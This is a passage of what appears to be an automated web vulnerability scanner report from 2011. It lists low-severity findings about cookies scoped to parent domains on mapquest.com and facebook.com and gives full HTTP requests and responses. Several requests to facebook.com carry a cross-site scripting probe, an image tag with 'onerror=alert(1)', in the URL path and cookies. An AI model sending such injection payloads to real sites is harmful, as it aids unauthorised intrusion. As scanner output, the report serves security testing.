Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Expires: Mon, 20 Dec 1998 01:00:00 GMT
Last-Modified: Thu, 05 May 2011 00:57:09 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: application/json
Date: Thu, 05 May 2011 00:57:09 GMT
Content-Length: 464

{"data":{"parameters":{"dotcom-right-header":{"adParametersTypeString":"HTML","encodedStateHash":null,"htmlText":"","type":"HTML"},"bottom-content":{"adParametersTypeString":"UAC","adTitle":null,"adTy
...[SNIP]...

10.4. http://www.mapquest.com/_svc/apixel previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/_svc/apixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_svc/apixel?t=jsop&i=_0&v=4&1=mq.main&2=mq%20main&3=no%20referrer&4=map%20%3A%20afarm%20%3A%20baseline&5=none&6=null&7=undefined&8=null HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:11 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache,no-store,must-revalidate
Expires: Mon, 1 Feb 2001 08:32:00 GMT
Content-Type: image/gif
Content-Length: 35
Date: Thu, 05 May 2011 00:57:10 GMT

GIF87a.............,...........D..;

10.5. http://www.mapquest.com/_svc/publishing/promo previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/_svc/publishing/promo

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /_svc/publishing/promo HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
Origin: http://www.mapquest.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="
Content-Length: 62

{"key":"winston-site-selector","language":"en","country":"us"}

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Expires: Mon, 20 Dec 1998 01:00:00 GMT
Last-Modified: Thu, 05 May 2011 00:57:09 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: application/json
Date: Thu, 05 May 2011 00:57:08 GMT
Content-Length: 1199

{"data":{"text":"<ul>\r\n <li><a onclick=\"m3.util.Event.publish('EventLog', {action: 'MQSITES-ROUTEPLANNER-CLICK'});\" href=\"http://www.mapquest.com/routeplanner\">Route Planner</a></li>\r\n <
...[SNIP]...

10.6. http://www.mapquest.com/_svc/searchio previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/_svc/searchio

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_svc/searchio?action=config&locale=en_US&shapepoints=(32.93119675804705,-96.97066137694627,32.64256910519762,-96.62733862305373) HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Cache-Control: no-transform
Content-Type: application/json;charset=UTF-8
Date: Thu, 05 May 2011 00:57:08 GMT
Content-Length: 101621

{"advertisers":[{"addressSummaryPrefixUrl":null,"addressSummaryTracking":[],"bannerAds":[{"height":0,"magicNumber":"93306669","type":"234x60","width":0}],"branded":true,"brandedSearchOnly":false,"clus
...[SNIP]...

10.7. http://www.mapquest.com/cdn/_uac/adpage.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/cdn/_uac/adpage.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdn/_uac/adpage.htm HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:11 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"1171-1304454928000"
Last-Modified: Tue, 03 May 2011 20:35:28 GMT
Content-Type: text/html
Cteonnt-Length: 1171
Date: Thu, 05 May 2011 00:57:10 GMT
Content-Length: 1171

<html>
<head>
<script type='text/javascript'>
var blockedReferrer = "";
var dom=location.hash
if (dom!=''){
dom=dom.substr(1)
document.domain=dom
}

function adsPageOnL(){
var adFr=window.frameE
...[SNIP]...

10.8. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/cdn/dotcom3/images/new_purple_button.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdn/dotcom3/images/new_purple_button.jpg HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:10 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"660-1304454926000"
Last-Modified: Tue, 03 May 2011 20:35:26 GMT
Content-Type: image/jpeg
Content-Length: 660
Date: Thu, 05 May 2011 00:57:09 GMT

.PNG
.
...IHDR...,.........J3......tEXtSoftware.Adobe ImageReadyq.e<...6IDATx.b...?.P..C..,+'..Z.& ...~Pz .w >..w.q.1.o.b.A...@\.b0.P ....cA...=p9..7... K.8...M...as.=....RB....13...r..BbB...\..y
...[SNIP]...

10.9. http://www.mapquest.com/icons/stop.png previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/icons/stop.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/stop.png?text=A HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:10 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Last-Modified: Tue, 03 May 2011 20:35:24 GMT
Expires: Thu, 05 May 2011 01:21:10 GMT
Content-Type: image/png
Date: Thu, 05 May 2011 00:57:09 GMT
Content-Length: 923

.PNG
.
...IHDR.............e/O]...bIDATx....K.Q..p!.......B..H...x.LM!..m....L.i*....y...-.."...@0....YI.."J...5...wv6...[.m.e...9.....9...8....WN`Na$<t..[..0)f..5C..Y......L.TH.$.^[....
..M.{).%...
...[SNIP]...

10.10. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.11. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=hrTlo; path=/; domain=.facebook.com
reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://burp/show/11
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=hrTlo; path=/; domain=.facebook.com
Set-Cookie: reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.40.55
X-Cnection: close
Date: Thu, 05 May 2011 11:29:43 GMT
Content-Length: 11493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.12. http://www.facebook.com/10000082482078341583 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/10000082482078341583<img%20src=a%20onerror=alert(1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /10000082482078341583<img%20src=a%20onerror=alert(1 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.31
Connection: close
Date: Thu, 05 May 2011 11:43:13 GMT
Content-Length: 11422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.13. http://www.facebook.com/10000082482078341583ab0e5e0e0bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.55
Connection: close
Date: Thu, 05 May 2011 11:43:11 GMT
Content-Length: 11470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.14. http://www.facebook.com/1242845259 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/1242845259

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; wd=1022x1007

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.96.57
X-Cnection: close
Date: Thu, 05 May 2011 11:56:38 GMT
Content-Length: 11260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.15. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://burp/show/12
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; wd=1022x1007

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.102.67
X-Cnection: close
Date: Thu, 05 May 2011 11:56:26 GMT
Content-Length: 11478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.16. http://www.facebook.com/2008/fbml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/2008/fbml

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
